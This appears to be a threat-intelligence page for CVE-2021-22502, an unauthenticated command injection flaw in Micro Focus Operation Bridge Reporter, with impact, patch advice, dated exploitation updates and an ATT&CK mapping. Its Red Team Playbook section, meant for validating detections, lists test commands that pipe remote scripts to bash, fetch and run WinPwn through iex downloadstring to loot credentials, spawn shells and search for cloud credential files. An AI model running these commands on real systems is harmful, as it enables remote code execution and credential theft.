CVE-2021-22502

CRITICAL CISA KEV EXPLOIT TTE 3h Pub 08/02 Upd 21/10

Overview

This vulnerability is a command injection flaw rooted in improper input validation within the Operation Bridge Reporter (OBR) server's administrative API. Specifically, the POST endpoint /AdminService/urest/v1/LogonResource fails to sanitize user-supplied data in the 'userName' parameter, allowing shell commands to be injected and executed. The affected component is the OBR 10.40 server's authentication service interface handling logon requests.

Vulnerability Description

Remote Code execution vulnerability in Micro Focus Operation Bridge Reporter (OBR) product, affecting version 10.40. The vulnerability could be exploited to allow Remote Code Execution on the OBR server.

Impact

An unauthenticated attacker can execute arbitrary system commands on the Operation Bridge Reporter server, resulting in complete control over the affected system. This includes the ability to deploy malware, exfiltrate sensitive monitoring data, modify or delete information, and disrupt monitoring operations. No user interaction or credentials are required to exploit this flaw, enabling remote attackers to achieve full system compromise and potentially pivot within the network environment.

Solution

Micro Focus has released a security advisory (KM03775947) addressing this issue in Operation Bridge Reporter version 10.40. Users should apply the vendor-provided patches as detailed in the advisory at https://softwaresupport.softwaregrp.com/doc/KM03775947. It is recommended to follow the vendor’s update instructions promptly to remediate the command injection vulnerability and mitigate associated risks.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The remote code execution vulnerability in Micro Focus Operation Bridge Reporter (OBR) version 10.40 presents a significant security risk due to its ability to allow unauthorized execution of arbitrary code on the server. This vulnerability arises from improper input validation, which can be exploited by an attacker to send crafted requests to the OBR server. When these requests are processed, they can lead to the execution of malicious code with the same privileges as the OBR application. The lack of sufficient safeguards to validate and sanitize user inputs creates a pathway for attackers to manipulate the application’s behavior, ultimately compromising the integrity and confidentiality of the system.

Attack vectors for this vulnerability are primarily network-based, allowing remote attackers to exploit the flaw without needing physical access to the affected system. An attacker could leverage various methods, such as sending specially crafted HTTP requests or utilizing automated scripts to probe for the vulnerability. Once the attacker successfully exploits the vulnerability, they can execute arbitrary commands, potentially leading to full system compromise. This could involve deploying malware, exfiltrating sensitive data, or using the compromised server as a launching point for further attacks within the network. The ease of exploitation combined with the remote nature of the attack makes this vulnerability particularly concerning for organizations relying on the OBR product for operational reporting and monitoring.

The real-world impact of this vulnerability is substantial, especially for organizations that utilize Micro Focus Operation Bridge Reporter for critical business operations. A successful exploitation could lead to severe consequences, including data breaches, loss of sensitive information, and disruption of services. The business risk extends beyond immediate financial losses; it can also damage an organization’s reputation and erode customer trust. Furthermore, regulatory implications could arise if sensitive data is compromised, leading to potential fines and legal repercussions. The high CVSS score of 9.8 underscores the critical nature of this vulnerability and the urgent need for remediation.

To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular vulnerability assessments and penetration testing can help identify potential weaknesses in the OBR deployment. Additionally, organizations should ensure that they are running the latest version of the software, as vendors typically release patches to address known vulnerabilities. Network segmentation can also be employed to limit access to the OBR server, reducing the attack surface. Implementing robust intrusion detection systems (IDS) can help monitor for unusual activity indicative of exploitation attempts. Furthermore, organizations should establish an incident response plan to quickly address any potential breaches resulting from this vulnerability.

In conclusion, the remote code execution vulnerability in Micro Focus Operation Bridge Reporter poses a critical threat to organizations that depend on this software for their operational needs. The potential for exploitation through remote attacks, combined with the severe implications for business operations and data security, necessitates immediate attention. By adopting proactive detection and mitigation strategies, organizations can significantly reduce their risk exposure and protect their assets from malicious actors seeking to exploit this vulnerability.




CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting the critical remote code execution vulnerability in Micro Focus Operation Bridge Reporter (OBR). While the overall exploit activity remains steady, this modest uptick in telemetry suggests persistent adversary interest, particularly given the availability of a Metasploit module that facilitates pre-authentication command injection on affected Linux versions. The EPSS score remains high but shows a marginal decline, indicating that although the likelihood of exploitation is still significant, the momentum of attack campaigns has plateaued rather than accelerated. This nuanced shift underscores the importance of continuous monitoring, as threat actors maintain capabilities to leverage this vulnerability with minimal complexity. Consequently, the risk level remains critical, reflecting the vulnerability’s ease of exploitation and potential impact on operational environments.



Update 2 — May 23, 2026

CSURFACE threat intelligence has detected a notable surge in exploitation attempts targeting CVE-2021-22502, reflected by a marked increase in telemetry activity. This uptick coincides with a slight rise in the EPSS score, indicating a growing likelihood of successful exploitation in operational environments. The emergence of a publicly available Metasploit module that enables pre-authentication command injection on affected Linux versions continues to lower the barrier for threat actors, facilitating more frequent and opportunistic attacks. While ransomware involvement remains unconfirmed, the increased exploitation activity elevates the risk of severe operational disruption and data compromise. Consequently, the threat level for this vulnerability remains critical, with the recent developments underscoring the necessity for heightened vigilance and continuous monitoring.



Update 3 — June 07, 2026

CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting the CVE-2021-22502 vulnerability in Micro Focus Operation Bridge Reporter. This uptick, while moderate, reflects a sustained interest by threat actors in leveraging the publicly available Metasploit module that facilitates pre-authentication command injection on affected Linux versions. The persistence of these attempts underscores the vulnerability’s continued appeal as an attack vector, particularly given the ease of exploitation and the critical severity rating. Although ransomware usage linked to this vulnerability remains unconfirmed, the growing exploitation activity heightens the risk of unauthorized access and potential operational disruption. Consequently, the threat level remains critical, with the recent telemetry trends reinforcing the necessity for ongoing vigilance and proactive detection efforts.



Update 4 — July 05, 2026

CSURFACE threat intelligence has detected a discernible uptick in exploitation attempts targeting the Micro Focus Operation Bridge Reporter vulnerability, reflecting a sustained and growing adversary interest. This increase in activity, while moderate, signals that threat actors continue to prioritize this vector due to its straightforward exploitation path and pre-authentication command injection capability. The availability of a Metasploit module further lowers the barrier for attackers, potentially broadening the pool of less sophisticated actors able to leverage this flaw. Although ransomware deployment linked to this vulnerability remains unconfirmed, the persistent and rising exploitation attempts elevate the risk of unauthorized system compromise and operational impact. Consequently, the threat level associated with CVE-2021-22502 remains critical, underscoring the imperative for defenders to maintain heightened detection and response postures in environments running affected versions.



Update 5 — July 14, 2026

CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2021-22502, consistent with ongoing attacker interest in this critical remote code execution vulnerability. While the overall trend remains stable, the uptick in activity suggests persistent adversary efforts to leverage the publicly available Metasploit module, which continues to lower the technical barrier for exploitation. Our telemetry indicates that these attempts are primarily focused on unauthenticated command injection vectors on vulnerable Micro Focus Operation Bridge Reporter instances. Although there is still no confirmed linkage to ransomware campaigns, the sustained and incremental rise in exploitation attempts underscores the continued risk of unauthorized access and potential operational disruption. This evolving landscape reinforces the critical threat level of CVE-2021-22502, emphasizing that defenders must remain vigilant as adversaries maintain active interest and capability to exploit this flaw.

Affected Products (1)

Vendor Product Version CPE
microfocus Microfocus Operation Bridge Reporter 10.40 cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

Metasploit (1)

Module Authors Rank Platform Link
Micro Focus Operations Bridge Reporter Unauthenticated Command Injection
exploits/linux/http/microfocus_obr_cmd_injection
- Unknown - View
Exploited in Wild CONFIRMED
Ransomware NOT ASSOCIATED
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

32 events
2026-07-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-11
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-14
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-11
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-31
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-25
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-17
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-10
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2021-11-03
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2021-02-09
Exploit Published (0 ExploitDB, 1 Metasploit)

Public exploit code is available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

OS Command Injection
100% command_injection
Remote Code Execution
96% rce
Code Injection
75% code_injection
Buffer Overflow
43% buffer_overflow

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1505.003 Web Shell Kill Chain persistence Linux, macOS, Network Devices, Windows
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-43 Exploiting Multiple Input Interpretation Layers
43%
Medium High
CAPEC-88 OS Command Injection
41%
High High
CAPEC-6 Argument Injection
40%
High High

Red Team Playbook

44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1505.003 Web Shell Written to Disk Windows CMD
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Command (CMD)
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (6)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2021-22502
softwaresupport.softwaregrp.com
GitHub CVE x_refsource_MISC
https://softwaresupport.softwaregrp.com/doc/KM03775947
zerodayinitiative.com
GitHub CVE x_refsource_MISC
https://www.zerodayinitiative.com/advisories/ZDI-21-153/
zerodayinitiative.com
GitHub CVE x_refsource_MISC
https://www.zerodayinitiative.com/advisories/ZDI-21-154/
packetstormsecurity.com
GitHub CVE x_refsource_MISC
http://packetstormsecurity.com/files/162408/Micro-Focus-Operations-Bridge-Reporter-Unauthenticated-Command-Injection.html
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-22502